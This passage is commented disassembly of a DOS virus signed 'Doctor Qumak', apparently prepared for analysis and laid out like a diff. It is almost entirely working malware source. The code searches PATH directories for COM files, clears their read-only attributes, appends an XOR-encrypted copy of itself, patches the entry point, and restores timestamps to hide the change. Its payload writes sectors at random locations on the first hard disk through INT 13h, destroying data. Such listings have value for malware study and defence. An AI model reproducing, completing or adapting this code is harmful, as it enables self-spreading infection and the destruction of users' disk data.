;031A .BF 0100 + mov cx,7 ;changed bytes ;031D B9 0007 + nop ;0320 90 + rep movsb ;0321 F3/ A4 + + mov si,dx ;0323 8B F2 + mov byte ptr ds:[si+0F8h],0 ;x_00F8 ;0325 C6 84 00F8 00 + mov ah,30h ;get DOS version nr ;032A B4 30 + int 21h ;032C CD 21 + cmp al,0 ;major version ;032E 3C 00 + nop ;0330 90 + jnz l_0335 ;0331 75 02 + nop ;0333 90 + nop ;0334 90 +l_0335: mov bp,0BFh ;x_00BF ;0335 BD 00BF + add bp,si ;0338 03 EE + mov byte ptr ds:[bp],0 ;033A 3E: C6 46 00 00 + push es ;033F 06 + nop ;0340 90 + mov ah,2Fh ;get DTA ptr into es:bx ;0341 B4 2F + int 21h ;0343 CD 21 + mov [si],bx ;x_0000 ;0345 89 1C + mov [si+2],es ;x_0002 ;0347 8C 44 02 + pop es ;034A 07 + mov dx,5Fh ;x_005F ;034B .BA 005F + add dx,si ;034E 03 D6 + mov ah,1Ah ;set DTA to ds:dx ;0350 B4 1A + int 21h ;0352 CD 21 + push es ;0354 06 + push si ;0355 56 + mov es,ds:[2Ch] ;environment segment ;0356 8E 06 002C + mov di,0 ;035A .BF 0000 +l_035D: pop si ;035D 5E + push si ;035E 56 + add si,1Ah ;x_001A ('PATH=') ;035F 83 C6 1A + lodsb ;0362 AC + mov cx,8000h ;0363 B9 8000 + repne scasb ;0366 F2/ AE + mov cx,4 ;0368 B9 0004 +l_036B: lodsb ;036B AC + scasb ;036C AE + jnz l_035D ;036D 75 EE + loop l_036B ;036F E2 FA + + ;<----- Environment variable 'PATH=' + pop si ;0371 5E + pop es ;0372 07 + mov [si+16h],di ;x_0016 ;0373 89 7C 16 + mov di,si ;0376 8B FE + add di,1Fh ;x_001F = work buffer ;0378 83 C7 1F + mov bx,si ;037B 8B DE + add si,1Fh ;x_001F = work buffer ;037D 83 C6 1F + mov di,si ;0380 8B FE + jmp short l_03CE ;0382 EB 4A + + ;<----- next directory +l_0384: cmp word ptr [si+16h],0 ;x_0016 = ptr in env ;0384 83 7C 16 00 + jne l_0392 ;-> not all in 'PATH' ;0388 75 08 + mov byte ptr ds:[si+0F8h],1 ;<- end of 'PATH' ;038A C6 84 00F8 01 + jmp l_04E9 ;038F E9 0157 + +l_0392: push ds ;0392 1E + push si ;0393 56 + mov bp,0BFh ;x_00BF ;0394 .BD 00BF + add bp,si ;0397 03 EE + mov ds,es:[02Ch] ;environment segment ;0399 26: 8E 1E 002C + mov di,si ;039E 8B FE + mov si,es:[di+16h] ;ptr in environment ;03A0 26: 8B 75 16 + add di,1Fh ;pattern address ;03A4 83 C7 1F +l_03A7: lodsb ;03A7 AC + cmp al,';' ;directory delimiter ;03A8 3C 3B + je l_03BB ;03AA 74 0F + cmp al,0 ;03AC 3C 00 + je l_03B8 ;position delimiter ;03AE 74 08 + mov es:[bp],al ;03B0 26: 88 46 00 + inc bp ;03B4 45 + stosb ;03B5 AA + jmp short l_03A7 ;03B6 EB EF + +l_03B8: mov si,0 ;end of path ptr ;03B8 .BE 0000 +l_03BB: pop bx ;03BB 5B + pop ds ;03BC 1F + mov [bx+16h],si ;save current ptr ;03BD 89 77 16 + cmp byte ptr [di-1],'\' ;last path char ;03C0 80 7D FF 5C + je l_03CE ;-> o.k. ;03C4 74 08 + mov al,'\' ;<- add dir delimiter ;03C6 B0 5C + mov es:[bp],al ;03C8 26: 88 46 00 + inc bp ;03CC 45 + stosb ;03CD AA + +l_03CE: mov byte ptr es:[bp],0 ;x_00BF ;03CE 26: C6 46 00 00 + mov bp,0 ;03D3 BD 0000 + mov [bx+18h],di ;[x_0018]:=x_001F ;03D6 89 7F 18 + mov si,bx ;offset d_0683 ;03D9 8B F3 + add si,10h ;x_0010 ('*.COM') ;03DB 83 C6 10 + mov cx,6 ;03DE B9 0006 + rep movsb ;03E1 F3/ A4 + mov si,bx ;03E3 8B F3 + mov ah,4Eh ;find 1st filenam match @ds:dx ;03E5 B4 4E + mov dx,01Fh ;x_001F (file pattern) ;03E7 .BA 001F + add dx,si ;03EA 03 D6 + mov cx,3 ;attribute pattern ;03EC B9 0003 + int 21h ;03EF CD 21 + jmp short l_0429 ;03F1 EB 36 + + ;<----- next file in the same directory +l_03F3: mov bp,0BFh ;file name address ;03F3 .BD 00BF + add bp,si ;03F6 03 EE + push bp ;03F8 55 + mov ax,0 ;03F9 B8 0000 + dec bp ;03FC 4D +l_03FD: inc bp ;03FD 45 + cmp byte ptr ds:[bp],'\' ;begin of file name ;03FE 3E: 80 7E 00 5C + jne l_0407 ;0403 75 02 + mov ax,bp ;possibly here ;0405 8B C5 +l_0407: cmp byte ptr ds:[bp],0 ;end of filename ? ;0407 3E: 80 7E 00 00 + jne l_03FD ;-> not now ;040C 75 EF + cmp ax,0 ;have been any dir ? ;040E 3D 0000 + pop bp ;0411 5D + jnz l_041B ;-> yes ;0412 75 07 + mov byte ptr ds:[bp],0 ;<- we are in the root ;0414 3E: C6 46 00 00 + jmp short l_0425 ;0419 EB 0A + +l_041B: mov bp,ax ;end of path address ;041B 8B E8 + mov byte ptr ds:[bp+1],0 ;end ptr ;041D 3E: C6 46 01 00 + mov bp,0 ;0422 BD 0000 +l_0425: mov ah,4Fh ;find next file match ;0425 B4 4F + int 21h ;0427 CD 21 + + +l_0429: jnc l_042E ;0429 73 03 + jmp l_0384 ;-> end of files in current dir ;042B E9 FF56 + +l_042E: mov bp,0BFh ;x_00BF = victim name ;042E .BD 00BF + add bp,si ;0431 03 EE + dec bp ;0433 4D +l_0434: inc bp ;0434 45 + cmp byte ptr ds:[bp],0 ;find end of path ;0435 3E: 80 7E 00 00 + jne l_0434 ;043A 75 F8 + mov di,bp ;043C 8B FD + mov bp,0 ;043E BD 0000 + push si ;0441 56 + add si,7Dh ;x_007D - DTA-file name ;0442 83 C6 7D +l_0445: lodsb ;add file name ;0445 AC + stosb ;0446 AA + cmp al,0 ;0447 3C 00 + jne l_0445 ;0449 75 FA + pop si ;044B 5E + mov dx,si ;044C 8B D6 + add dx,0BFh ;x_00BF = file name ;044E .81 C2 00BF + mov ax,3D00h ;open file R/O ;0452 B8 3D00 + int 21h ;0455 CD 21 + jnc l_045C ;0457 73 03 + jmp l_0384 ;-> error, next dir ;0459 E9 FF28 + +l_045C: mov bx,ax ;file handle ;045C 8B D8 + mov dx,0B8h ;x_00B8 = file buffer ;045E .BA 00B8 + add dx,si ;0461 03 D6 + mov cx,7 ;bytes to read ;0463 B9 0007 + mov ah,3Fh ;read handle ;0466 B4 3F + int 21h ;0468 CD 21 + mov ah,3Eh ;close handle ;046A B4 3E + int 21h ;046C CD 21 + mov di,0BBh ;4,5,6,7 bytes from file;046E .BF 00BB + add di,si ;0471 03 FE + mov bx,0B4h ;contam. ptr pattern ;0473 .BB 00B4 + add bx,si ;0476 03 DE + mov ax,[di] ;0478 8B 05 + cmp ax,[bx] ;047A 3B 07 + jne l_0489 ;-> not infected yet ;047C 75 0B + mov ax,[di+2] ;047E 8B 45 02 + cmp ax,[bx+2] ;0481 3B 47 02 + jne l_0489 ;-> not infected yet ;0484 75 03 +l_0486: jmp l_03F3 ;-> allready infected ;0486 E9 FF6A + +l_0489: cmp word ptr [si+79h],0FA00h ;file size ;0489 81 7C 79 FA00 + nop ;048E 90 + ja l_0486 ;-> to big ;048F 77 F5 + cmp word ptr [si+79h],0Ah ;file size ;0491 83 7C 79 0A + jb l_0486 ;-> to small ;0495 72 EF + mov di,[si+18h] ;678Bh ?? ;0497 8B 7C 18 + push si ;049A 56 + add si,7Dh ;DTA - file name ;049B 83 C6 7D +l_049E: lodsb ;049E AC + stosb ;049F AA + cmp al,0 ;04A0 3C 00 + jne l_049E ;04A2 75 FA + pop si ;04A4 5E + mov ax,4300h ;get file attrb, nam@ds:dx ;04A5 B8 4300 + mov dx,01Fh ;file name ;04A8 .BA 001F + push si ;04AB 56 + pop si ;04AC 5E + add dx,si ;04AD 03 D6 + int 21h ;04AF CD 21 + mov [si+8],cx ;save oryginal attributes ;04B1 89 4C 08 + mov ax,4301h ;set file attrb, nam@ds:dx ;04B4 B8 4301 + and cl,0FEh ;clear R/O ;04B7 80 E1 FE + mov dx,01Fh ;04BA .BA 001F + add dx,si ;04BD 03 D6 + int 21h ;04BF CD 21 + + mov ax,3D02h ;open file R/W ;04C1 B8 3D02 + mov dx,01Fh ;file name address ;04C4 .BA 001F + add dx,si ;04C7 03 D6 + int 21h ;04C9 CD 21 + jnc l_04D0 ;-> O.K. ;04CB 73 03 + jmp l_0638 ;-> error ;04CD E9 0168 +l_04D0: mov bx,ax ;file handle ;04D0 8B D8 + mov ax,5700h ;get file date & time ;04D2 B8 5700 + int 21h ; DOS Services ah=function 57h ;04D5 CD 21 + mov [si+4],cx ;04D7 89 4C 04 + mov [si+6],dx ;04DA 89 54 06 + mov ah,2Ch ;get time ;04DD B4 2C + int 21h ;04DF CD 21 + and dh,7 ;seconds ;04E1 80 E6 07 + jz l_04E9 ;04E4 74 03 + jmp l_0572 ;-> contamine ;04E6 E9 0089 + + ;<- end of 'PATH' members +l_04E9: push bx ;04E9 53 + push si ;04EA 56 + mov ah,8 ;read parameters for drive dl ;04EB B4 08 + mov dl,80h ;HDD 0 ;04ED B2 80 + int 13h ;04EF CD 13 + cmp dl,0 ;nr of fixed disks ;04F1 80 FA 00 + je l_0562 ;-> no HDD ;04F4 74 6C + mov al,cl ;04F6 8A C1 + and al,3Fh ; '?' ;04F8 24 3F + mov ds:[si+0F4h],al ;04FA 88 84 00F4 + mov al,ch ;04FE 8A C5 + mov ah,cl ;0500 8A E1 + and ah,0C0h ;0502 80 E4 C0 + mov cl,6 ;0505 B1 06 + shr ah,cl ;0507 D2 EC + mov ds:[si+0F1h],ax ;0509 89 84 00F1 + mov ds:[si+0F3h],dh ;050D 88 B4 00F3 +l_0511: mov ah,2Ch ; ',' ;0511 B4 2C + int 21h ; DOS Services ah=function 2Ch ;0513 CD 21 + ; get time, cx=hrs/min, dh=sec + shr dl,1 ;0515 D0 EA + shr dl,1 ;0517 D0 EA + and dl,7 ;0519 80 E2 07 + cmp dl,ds:[si+0F3h] ;051C 3A 94 00F3 + ja l_0511 ;0520 77 EF + mov ds:[si+0F7h],dl ;0522 88 94 00F7 + push ds ;0526 1E + mov ax,0 ;0527 B8 0000 + mov ds,ax ;052A 8E D8 + mov bx,046Ch ;052C .BB 046C + mov ax,[bx] ;052F 8B 07 + mov dx,[bx+2] ;0531 8B 57 02 + pop ds ;0534 1F + div word ptr ds:[si+0F1h] ;0535 F7 B4 00F1 +l_0539: cmp dx,ds:[si+0F1h] ;0539 3B 94 00F1 + jbe l_0543 ;053D 76 04 + shr dx,1 ;053F D1 EA + jmp short l_0539 ;0541 EB F6 +l_0543: mov ds:[si+0F5h],dx ;0543 89 94 00F5 + mov ax,dx ;0547 8B C2 + mov dl,80h ;0549 B2 80 + mov dh,ds:[si+0F7h] ;054B 8A B4 00F7 + mov ch,al ;054F 8A E8 + mov cl,6 ;0551 B1 06 + shl ah,cl ;0553 D2 E4 + mov cl,ah ;0555 8A CC + mov ah,3 ;0557 B4 03 + or cl,1 ;0559 80 C9 01 + mov al,ds:[si+0F4h] ;055C 8A 84 00F4 + int 13h ; Disk dl=drive 0 ah=func 03h ;0560 CD 13 + ; write sectors from mem es:bx + + ;<----- +l_0562: pop si ;0562 5E + pop bx ;0563 5B + cmp byte ptr ds:[si+0F8h],0 ;x_00F8 ;0564 80 BC 00F8 00 + je l_056E ;-> O.K. ;0569 74 03 + jmp l_0647 ;-> no 'PATH' ;056B E9 00D9 + +l_056E: jmp l_0628 ;056E E9 00B7 + nop ;0571 90 + + ;<----- contamine file +l_0572: mov ah,3Fh ; '?' ;0572 B4 3F + mov cx,7 ;0574 B9 0007 + mov dx,0ADh ;0577 .BA 00AD + add dx,si ;057A 03 D6 + int 21h ; DOS Services ah=function 3Fh ;057C CD 21 + ; read file, cx=bytes, to ds:dx + jnc l_0583 ;057E 73 03 + jmp l_0628 ;0580 E9 00A5 +l_0583: cmp ax,7 ;0583 3D 0007 + je l_058B ;0586 74 03 + jmp l_0628 ;0588 E9 009D +l_058B: mov ax,4202h ;058B B8 4202 + mov cx,0 ;058E B9 0000 + mov dx,0 ;0591 BA 0000 + int 21h ; DOS Services ah=function 42h ;0594 CD 21 + ; move file ptr, cx,dx=offset + jnc l_059B ;0596 73 03 + jmp l_0628 ;0598 E9 008D +l_059B: mov cx,ax ;059B 8B C8 + sub ax,3 ;059D 2D 0003 + mov [si+0Eh],ax ;05A0 89 44 0E + add cx,490h ;05A3 81 C1 0490 + mov di,si ;05A7 8B FE + sub di,38Eh ;05A9 81 EF 038E + mov [di],cx ;05AD 89 0D + mov ah,40h ; '@' ;05AF B4 40 + mov cx,489h ;05B1 B9 0489 + mov dx,si ;05B4 8B D6 + sub dx,390h ;05B6 81 EA 0390 + push dx ;05BA 52 + push cx ;05BB 51 + push bx ;05BC 53 + push ax ;05BD 50 + mov ah,2Ch ; ',' ;05BE B4 2C + int 21h ; DOS Services ah=function 2Ch ;05C0 CD 21 + ; get time, cx=hrs/min, dh=sec + mov dl,cl ;05C2 8A D1 + add dl,dh ;05C4 02 D6 + add dl,82h ;05C6 80 C2 82 + mov [si-1],dl ;05C9 88 54 FF + mov bx,si ;05CC 8B DE + mov cx,0F9h ;05CE B9 00F9 + +l_05D1: mov al,[bx] ;05D1 8A 07 + xor al,dl ;05D3 32 C2 + mov [bx],al ;05D5 88 07 + inc bx ;05D7 43 + loop l_05D1 ;05D8 E2 F7 + + pop ax ;05DA 58 + pop bx ;05DB 5B + pop cx ;05DC 59 + pop dx ;05DD 5A + int 21h ; DOS Services ah=function 40h ;05DE CD 21 + ; write file cx=bytes, to ds:dx + push dx ;05E0 52 + push cx ;05E1 51 + push bx ;05E2 53 + push ax ;05E3 50 + mov bx,si ;05E4 8B DE + mov cx,0F9h ;05E6 B9 00F9 + mov dl,[si-1] ;05E9 8A 54 FF + +l_05EC: mov al,[bx] ;05EC 8A 07 + xor al,dl ;05EE 32 C2 + nop ;05F0 90 + mov [bx],al ;05F1 88 07 + inc bx ;05F3 43 + loop l_05EC ;05F4 E2 F6 + + pop ax ;05F6 58 + pop bx ;05F7 5B + pop cx ;05F8 59 + pop dx ;05F9 5A + jc l_0628 ;05FA 72 2C + cmp ax,489h ;05FC 3D 0489 + jne l_0628 ;05FF 75 27 + mov ax,4200h ;0601 B8 4200 + nop ;0604 90 + mov cx,0 ;0605 B9 0000 + mov dx,0 ;0608 BA 0000 + int 21h ; DOS Services ah=function 42h ;060B CD 21 + ; move file ptr, cx,dx=offset + jc l_0628 ;060D 72 19 + mov ah,40h ; '@' ;060F B4 40 + mov cx,3 ;0611 B9 0003 + mov dx,si ;0614 8B D6 + add dx,0Dh ;0616 83 C2 0D + int 21h ; DOS Services ah=function 40h ;0619 CD 21 + ; write file cx=bytes, to ds:dx + mov cx,4 ;061B B9 0004 + mov dx,si ;061E 8B D6 + add dx,0B4h ;0620 .81 C2 00B4 + mov ah,40h ; '@' ;0624 B4 40 + int 21h ; DOS Services ah=function 40h ;0626 CD 21 + ; write file cx=bytes, to ds:dx +l_0628: mov dx,[si+6] ;0628 8B 54 06 + nop ;062B 90 + mov cx,[si+4] ;062C 8B 4C 04 + mov ax,5701h ;062F B8 5701 + int 21h ; DOS Services ah=function 57h ;0632 CD 21 + ; get/set file date & time + mov ah,3Eh ; '>' ;0634 B4 3E + int 21h ; DOS Services ah=function 3Eh ;0636 CD 21 + ; close file, bx=file handle +l_0638: mov ax,4301h ;0638 B8 4301 + mov cx,[si+8] ;063B 8B 4C 08 + mov dx,01Fh ;063E .BA 001F + nop ;0641 90 + add dx,si ;0642 03 D6 + nop ;0644 90 + int 21h ; DOS Services ah=function 43h ;0645 CD 21 + ; get/set file attrb, nam@ds:dx + + ;<----- EXIT +l_0647: push ds ;0647 1E + mov ah,1Ah ;set DTA to ds:dx ;0648 B4 1A + mov dx,[si] ;saved victim DTA ;064A 8B 14 + mov ds,[si+2] ;064C 8E 5C 02 + int 21h ;064F CD 21 + pop ds ;restore registers ;0651 1F + pop cx ;0652 59 + xor ax,ax ;0653 33 C0 + xor bx,bx ;0655 33 DB + xor dx,dx ;0657 33 D2 + xor si,si ;0659 33 F6 + nop ;065B 90 + mov di,100h ;Victim entry point ;065C .BF 0100 + nop ;065F 90 + push di ;0660 57 + nop ;0661 90 + xor di,di ;0662 33 FF + retn ;-> run victim ;0664 C3 + + db 1,2,3 ;0665 01 02 03 + db 1,2,3 ;0668 01 02 03 + db 4,5,6 ;066B 04 05 06 + + db 0Dh,0Ah ;066E 0D 0A + db '(C) DOCTOR QUMAK' ;0670 28 43 29 20 44 4F 43 54 + ;0678 4F 52 20 51 55 4D 41 4B + db 0Dh,0Ah ;0680 0D 0A + + db 0B6h ;klucz kodowania ;0682 B6 + +d_0683 label byte + +x_0000 dw 0080h ;victim DTA offset ;0000 80 00 +x_0002 dw 10ABh ;victim DTA segment ;0003 AB 10 +x_0004 dw 9BEFh ;victim time stamp ;0004 EF 9B +x_0006 dw 1587h ;victim date stamp ;0006 87 15 +x_0008 dw 0020h ;victim attribute ;0008 20 00 + + db 0E9h,0F9h,00h ;000A E9 F9 00 + db 0E9h,0F0h,01h ;000D E9 F0 01 + +x_0010 db '*.COM',0 ;0010 2A 2E 43 4F 4D 00 +x_0016 dw 002Ah ;ptr in environment ;0016 2A 00 + +x_0018 dw 678Bh ;??? ;0018 8B 67 + +x_001A db 'PATH=' ;001A 50 41 54 48 3D +x_001F db 'CS.COM',0 ;001F 43 53 2E 43 4F 4D 00 + db '.COM', 0 ;0026 2E 43 4F 4D 00 + db 'T.COM', 0 ;002B 54 2E 43 4F 4D 00 + db 'OM',0 ;0031 4F 4D 00 + db 43 dup (' ') ;0034 002B[20] + + ;<----- virus DTA +x_005F db 04h ;005F 04 + db '????????COM' ;0060 0008[3F] 43 4F 4D + db 03h,14h,00h,51h,01h,00h,00h,00h,00h ;006B 03 14 00 51 01 00 00 00 00 +x_0074 db 20h ;attribute found ;0074 20 +x_0075 dw 9BEFh ;time stamp ;0075 EF 9B +x_0077 dw 1587h ;date stamp ;0077 87 15 +x_0079 dw 01F3h,0 ;file size ;0079 F3 01 00 00 +x_007D db 'CS.COM',0,' COM',0,0 ;file name ;007D 43 53 2E 43 4F 4D 00 20 43 4F 4D 00 00 + + db 0EAh,0F0h ;008A EA F0 + db 0FFh, 00h,0F0h ;008C FF 00 F0 + db 'Hello world from my virus !',0Dh,0Ah,'$' ;008F 48 65 6C 6C 6F 20 + ;0095 77 6F 72 6C 64 20 + ;009B 66 72 6F 6D 20 6D + ;00A1 79 20 76 69 72 75 + ;00A7 73 20 21 0D 0A 24 + ;<----- Saved victim bytes +x_00AD db 0EBh,00h,1Eh,0B8h,00h,00h,50h ;00AD EB 00 1E B8 00 00 50 + + ;contamination pattern +x_00B4 db 6Bh,73h,0CAh,0Eh ;00B4 6B 73 CA 0E + + ;<----- file buffer +x_00B8 db 0EBh,00h,1Eh ;00B8 EB 00 1E +x_00BB db 0B8h,00h,00h,50h ;contam.ptr.here ;00BB B8 00 00 50 + +x_00BF db 'CS.COM',0 ;file name & path ;00BF 43 53 2E 43 4F 4D 00 + db '.COM',0 ;00C6 2E 43 4F 4D 00 + db 'T.COM', 0 ;00CB 54 2E 43 4F 4D 00 + db 'M',0 ;00D1 4D 00 + db ' the stuff that should be here' ;00D3 20 74 68 65 20 73 + ;00D9 74 75 66 66 20 74 + ;00DF 68 61 74 20 73 68 + ;00E5 6F 75 6C 64 20 62 + ;00EB 65 20 68 65 72 65 +x_00F1 dw 0 ;00F1 00 00 +x_00F3 db 0 ;00F3 00 +x_00F4 db 0 ;00F4 00 +x_00F5 dw 0 ;00F5 00 00 +x_00F7 db 0 ;00F7 00 +x_00F8 db 0 ;1=no path ;00F8 00 +seg_a ends + + end start + \ No newline at end of file